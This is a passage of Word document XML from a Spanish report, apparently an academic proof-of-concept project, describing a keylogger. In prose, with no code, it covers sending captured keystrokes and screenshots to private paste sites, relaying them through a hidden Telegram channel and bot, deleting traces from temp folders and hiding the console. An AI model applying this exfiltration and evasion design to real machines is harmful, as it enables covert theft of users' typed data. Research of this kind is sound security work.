    <w:p w:rsidR="0020154D" w:rsidRDefault="00314A87" w:rsidP="0020154D">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="25142735" wp14:editId="1130D2BB">
            <wp:extent cx="3279600" cy="2073600"/>
            <wp:effectExtent l="114300" t="114300" r="111760" b="136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73" t="2484" r="6860" b="4735"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3279600" cy="207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4A87" w:rsidRDefault="0020154D" w:rsidP="0020154D">
      <w:pPr>
        <w:pStyle w:val="Descripcin"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="264" w:name="_Toc19358256"/>
      <w:r>
        <w:t xml:space="preserve">Ilustración </w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:instrText xml:space="preserve"> SEQ Ilustración \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00E24312">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>117</w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Muestra de archivos de datos del keylogger y </w:t>
      </w:r>
      <w:r w:rsidR="000A6CEE">
        <w:t xml:space="preserve">archivos de </w:t>
      </w:r>
      <w:r>
        <w:t>capturas de pantalla.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="264"/>
    </w:p>
    <w:p w:rsidR="00FB105E" w:rsidRDefault="00FB105E" w:rsidP="001C6606">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
        <w:rPr>
          <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="265" w:name="_Toc19810097"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Configuración de servicios</w:t>
      </w:r>
      <w:bookmarkEnd w:id="265"/>
    </w:p>
    <w:p w:rsidR="00702B45" w:rsidRDefault="00702B45" w:rsidP="00FB105E">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:rPr>
          <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t>La recepción de datos del keylogger (en el caso de no recibirse con el monitor de red), se ha concebido desde el punto de vista de no dependencia de ningún servidor propio, y lo que hace el keylogger es enviar los datos a servicios de “paste” y Telegram.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FB105E" w:rsidRDefault="00FB105E" w:rsidP="00FB105E">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:rPr>
          <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">Para configurar cada uno de los servicios usados, pastebin, pastecode y telegram, se ha creado un fichero </w:t>
      </w:r>
      <w:r w:rsidRPr="00B66266">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t>config.py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> donde se ha externalizado dicha configuración. Hay que tener en cuenta que para algunos servicios se requiere un registro</w:t>
      </w:r>
      <w:r w:rsidR="00B66266">
        <w:rPr>
          <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> con usuario y contraseña</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> y la obtención de una API KEY.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B66266" w:rsidRDefault="00B66266" w:rsidP="00B66266">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1911056F" wp14:editId="3D0A4153">
            <wp:extent cx="3553200" cy="3229200"/>
            <wp:effectExtent l="114300" t="114300" r="104775" b="1428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200" cy="32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105E" w:rsidRPr="00FB105E" w:rsidRDefault="00B66266" w:rsidP="00AB6E22">
      <w:pPr>
        <w:pStyle w:val="Descripcin"/>
      </w:pPr>
      <w:bookmarkStart w:id="266" w:name="_Toc19358257"/>
      <w:r>
        <w:t xml:space="preserve">Ilustración </w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:instrText xml:space="preserve"> SEQ Ilustración \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00E24312">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>118</w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Parte del fichero de configuración de servicios, </w:t>
      </w:r>
      <w:r w:rsidR="00AB6E22">
        <w:t>config.py</w:t>
      </w:r>
      <w:bookmarkEnd w:id="266"/>
    </w:p>
    <w:p w:rsidR="00982D0E" w:rsidRDefault="001C6606" w:rsidP="001C6606">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
        <w:rPr>
          <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="267" w:name="_Toc19810098"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t>Envío al servicio de Paste</w:t>
      </w:r>
      <w:bookmarkEnd w:id="267"/>
    </w:p>
    <w:p w:rsidR="001C6606" w:rsidRDefault="001C6606" w:rsidP="009B063F">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:rPr>
          <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t>Una vez cada fichero llegue al tamaño mínimo especificado, se genera un nuevo fichero de datos temporal y el actual se envía a los servicios de Paste (</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB5AEF">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t>pastebin.com</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> y </w:t>
      </w:r>
      <w:r w:rsidRPr="00CB5AEF">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t>pastecode.xyz</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
      <w:r w:rsidR="00CB5AEF">
        <w:rPr>
          <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> Los envíos quedan como publicaciones privadas y solo los puede ver quien conozca la url y se borran automáticamente tras un periodo de tiempo. Hay que tener en cuenta que pastebin.com tiene una limitación de envíos diarios privados, cosa que no ocurre con pastecode.xyz.</w:t>
      </w:r>
      <w:r w:rsidR="00F56D76">
        <w:rPr>
          <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> Debido a esta limitación, en las pruebas finales del keylogger se ha desactivado el envío a este servicio y solo se han hecho los </w:t>
      </w:r>
      <w:r w:rsidR="007D572F">
        <w:rPr>
          <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t>envíos</w:t>
      </w:r>
      <w:r w:rsidR="00F56D76">
        <w:rPr>
          <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> a pastecode. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FB105E" w:rsidRDefault="006A07B0" w:rsidP="009B063F">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:rPr>
          <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t>La url generada con la publicación se envía al canal privado d</w:t>
      </w:r>
      <w:r w:rsidR="00F56D76">
        <w:rPr>
          <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t>e Telegram.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F56D76" w:rsidRDefault="00F56D76" w:rsidP="00F56D76">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4D78EA5D" wp14:editId="32C3CA20">
            <wp:extent cx="4582800" cy="3114000"/>
            <wp:effectExtent l="114300" t="114300" r="103505" b="1441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2800" cy="31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D76" w:rsidRDefault="00F56D76" w:rsidP="00F56D76">
      <w:pPr>
        <w:pStyle w:val="Descripcin"/>
      </w:pPr>
      <w:bookmarkStart w:id="268" w:name="_Toc19358258"/>
      <w:r>
        <w:t xml:space="preserve">Ilustración </w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:instrText xml:space="preserve"> SEQ Ilustración \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00E24312">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>119</w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>. Muestra de fichero enviado a pastecode.xyz</w:t>
      </w:r>
      <w:bookmarkEnd w:id="268"/>
    </w:p>
    <w:p w:rsidR="006A07B0" w:rsidRPr="006A07B0" w:rsidRDefault="006A07B0" w:rsidP="006A07B0">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
      </w:pPr>
      <w:bookmarkStart w:id="269" w:name="_Toc19810099"/>
      <w:r w:rsidRPr="006A07B0">
        <w:t>Canal de Telegram</w:t>
      </w:r>
      <w:bookmarkEnd w:id="269"/>
    </w:p>
    <w:p w:rsidR="00702B45" w:rsidRDefault="00702B45" w:rsidP="009B063F">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:rPr>
          <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">El Canal de Telegram provee al keylogger de cierta potencia y flexibilidad al mismo tiempo. Por un </w:t>
      </w:r>
      <w:r w:rsidR="00A95AD6">
        <w:rPr>
          <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t>lado,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> evita tener que configurar un servidor propio </w:t>
      </w:r>
      <w:r w:rsidR="00A95AD6">
        <w:rPr>
          <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t>para</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> recibir los datos, y por otro provee</w:t>
      </w:r>
      <w:r w:rsidR="00A95AD6">
        <w:rPr>
          <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> de una recepción de datos centralizad</w:t>
      </w:r>
      <w:r w:rsidR="00125825">
        <w:rPr>
          <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidR="00A95AD6">
        <w:rPr>
          <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> de diferentes keyloggers que además podrían recibir diferentes usuarios al mismo tiempo (cualquier usuario que se agregue al canal privado de Telegram).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00926A48" w:rsidRDefault="00926A48" w:rsidP="00926A48">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1C2E0D63" wp14:editId="2DC447B0">
            <wp:extent cx="3916800" cy="2502000"/>
            <wp:effectExtent l="133350" t="133350" r="140970" b="16510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11" t="1455" r="870" b="1965"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3916800" cy="250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6A48" w:rsidRDefault="00926A48" w:rsidP="00926A48">
      <w:pPr>
        <w:pStyle w:val="Descripcin"/>
      </w:pPr>
      <w:bookmarkStart w:id="270" w:name="_Toc19358259"/>
      <w:r>
        <w:t xml:space="preserve">Ilustración </w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:instrText xml:space="preserve"> SEQ Ilustración </w:instrText>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:instrText xml:space="preserve">\* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00E24312">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>120</w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>. Esquema funcionamiento envío a Telegram</w:t>
      </w:r>
      <w:bookmarkEnd w:id="270"/>
    </w:p>
    <w:p w:rsidR="00926A48" w:rsidRDefault="00926A48" w:rsidP="009B063F">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:rPr>
          <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="006A07B0" w:rsidRDefault="00A95AD6" w:rsidP="009B063F">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:rPr>
          <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Todo ello </w:t>
      </w:r>
      <w:r w:rsidR="00702B45">
        <w:rPr>
          <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">requiere </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">de </w:t>
      </w:r>
      <w:r w:rsidR="00702B45">
        <w:rPr>
          <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t>un</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidR="00702B45">
        <w:rPr>
          <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> puesta a punto previa que se ha llevado a cabo manualmente.</w:t>
      </w:r>
      <w:r w:rsidR="00723049">
        <w:rPr>
          <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> Para ello se ha creado un </w:t>
      </w:r>
      <w:r w:rsidR="00125825">
        <w:rPr>
          <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t>canal</w:t>
      </w:r>
      <w:r w:rsidR="00723049">
        <w:rPr>
          <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> privado de Telegram</w:t>
      </w:r>
      <w:r w:rsidR="00125825">
        <w:rPr>
          <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t>, el cual está oculto a cualquier usuario y solo se puede acceder si se conoce el enlace de invitación. Posteriormente se ha creado un bot de Telegram y este se ha añadido al Canal privado.</w:t>
      </w:r>
      <w:r w:rsidR="003615EB">
        <w:rPr>
          <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> El bot tiene múltiples funcionalidades de las que se podría hacer que leyera los mensajes publicados en el canal a modo de </w:t>
      </w:r>
      <w:r w:rsidR="00C97546">
        <w:rPr>
          <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t>consola</w:t>
      </w:r>
      <w:r w:rsidR="003615EB">
        <w:rPr>
          <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> de comandos </w:t>
      </w:r>
      <w:r w:rsidR="00C97546">
        <w:rPr>
          <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">para interactuar con este e </w:t>
      </w:r>
      <w:r w:rsidR="003615EB">
        <w:rPr>
          <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">interpretar </w:t>
      </w:r>
      <w:r w:rsidR="00C97546">
        <w:rPr>
          <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">palabras clave </w:t>
      </w:r>
      <w:r w:rsidR="003615EB">
        <w:rPr>
          <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">para dar órdenes al keylogger. Esto es una posibilidad que no se ha implementado. En este caso el funcionamiento es unidireccional, y lo único que hace el keylogger es enviar al bot de Telegram los enlaces de las URL de las publicaciones en pastebin y pastecode y las capturas de pantalla </w:t>
      </w:r>
      <w:r w:rsidR="00862405">
        <w:rPr>
          <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t>periódicas</w:t>
      </w:r>
      <w:r w:rsidR="003615EB">
        <w:rPr>
          <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> que toma el keylogger.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00723049" w:rsidRPr="00723049" w:rsidRDefault="00723049" w:rsidP="00723049">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:rPr>
          <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00FF541C" w:rsidRDefault="00FF541C" w:rsidP="00FF541C">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5DFEF1AB" wp14:editId="188A18F2">
            <wp:extent cx="4474800" cy="3657600"/>
            <wp:effectExtent l="133350" t="114300" r="135890" b="1714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23" r="1223" b="1218"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4474800" cy="365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B5AEF" w:rsidRDefault="00FF541C" w:rsidP="00FF541C">
      <w:pPr>
        <w:pStyle w:val="Descripcin"/>
      </w:pPr>
      <w:bookmarkStart w:id="271" w:name="_Toc19358260"/>
      <w:r>
        <w:t xml:space="preserve">Ilustración </w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:instrText xml:space="preserve"> SEQ Ilustración \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00E24312">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>121</w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>. Muestra del canal privado de Telegram con capturas de pantalla y enlaces recibidos</w:t>
      </w:r>
      <w:bookmarkEnd w:id="271"/>
    </w:p>
    <w:p w:rsidR="00FF541C" w:rsidRDefault="000F0BC2" w:rsidP="000F0BC2">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
        <w:rPr>
          <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="272" w:name="_Toc19810100"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t>Eliminación de rastro</w:t>
      </w:r>
      <w:bookmarkEnd w:id="272"/>
    </w:p>
    <w:p w:rsidR="000F0BC2" w:rsidRPr="00FF541C" w:rsidRDefault="00570EC5" w:rsidP="00FF541C">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:rPr>
          <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t>El</w:t>
      </w:r>
      <w:r w:rsidR="000F0BC2">
        <w:rPr>
          <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> keylogger se encarga también de intentar eliminar cualquier rastro de su actividad. Y aunque esto es prácticamente imposible al </w:t>
      </w:r>
      <w:r w:rsidR="00EF159D">
        <w:rPr>
          <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t>100%, tiene un proceso que se ejecuta al iniciar y finalizar el programa que borra de la carpeta de archivos temporales todos los archivos relacionados con el keylogger que se han generado, los de captura de teclado, y capturas de pantalla.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00926A48" w:rsidRDefault="00926A48">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B50DBE" w:rsidRDefault="00625635" w:rsidP="00862405">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
      </w:pPr>
      <w:bookmarkStart w:id="273" w:name="_Toc19810101"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Depurado del funcionamiento</w:t>
      </w:r>
      <w:bookmarkEnd w:id="273"/>
    </w:p>
    <w:p w:rsidR="00BB2E83" w:rsidRDefault="00AB6E22" w:rsidP="00B50DBE">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
      <w:r>
        <w:t>En una situación de un escenario real o de uso por parte de un ciberdelincuente, el keylogger perma</w:t>
      </w:r>
      <w:r w:rsidR="00862405">
        <w:t>ne</w:t>
      </w:r>
      <w:r>
        <w:t>ce oculto y por lo tanto la venta de consola no se muestra, ni muestra ningún mensaje por pantalla. Evidentemente, como esto es un POC se ha dotado la opción de no ocultar la venta</w:t>
      </w:r>
      <w:r w:rsidR="00BB2E83">
        <w:t>na</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> y mostrar mensajes de depuración.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00582FBA" w:rsidRDefault="00625635" w:rsidP="00582FBA">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="04EBBE01" wp14:editId="62E4E7C8">
            <wp:extent cx="5115600" cy="3268800"/>
            <wp:effectExtent l="114300" t="114300" r="104140" b="1416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5600" cy="32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635" w:rsidRDefault="00582FBA" w:rsidP="00582FBA">
      <w:pPr>
        <w:pStyle w:val="Descripcin"/>
      </w:pPr>
      <w:bookmarkStart w:id="274" w:name="_Toc19358261"/>
      <w:r>
        <w:t xml:space="preserve">Ilustración </w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:instrText xml:space="preserve"> SEQ Ilustración \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00E24312">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>122</w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>. Muestra de keylogger funcionando sin ocultar consola y activados mensajes de depuración.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="274"/>
    </w:p>
    <w:p w:rsidR="00582FBA" w:rsidRPr="00582FBA" w:rsidRDefault="00582FBA" w:rsidP="00582FBA">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:rPr>
          <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00582FBA" w:rsidRDefault="00582FBA" w:rsidP="00B50DBE">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00582FBA" w:rsidRDefault="00582FBA" w:rsidP="00B50DBE">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F71445" w:rsidRDefault="00F71445" w:rsidP="00660459">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="275" w:name="__RefHeading___Toc941_3518492859"/>
      <w:bookmarkEnd w:id="243"/>
    </w:p>
    <w:p w:rsidR="00372D4E" w:rsidRDefault="00372D4E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D25559" w:rsidRDefault="00D25559" w:rsidP="00D25559">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
      </w:pPr>
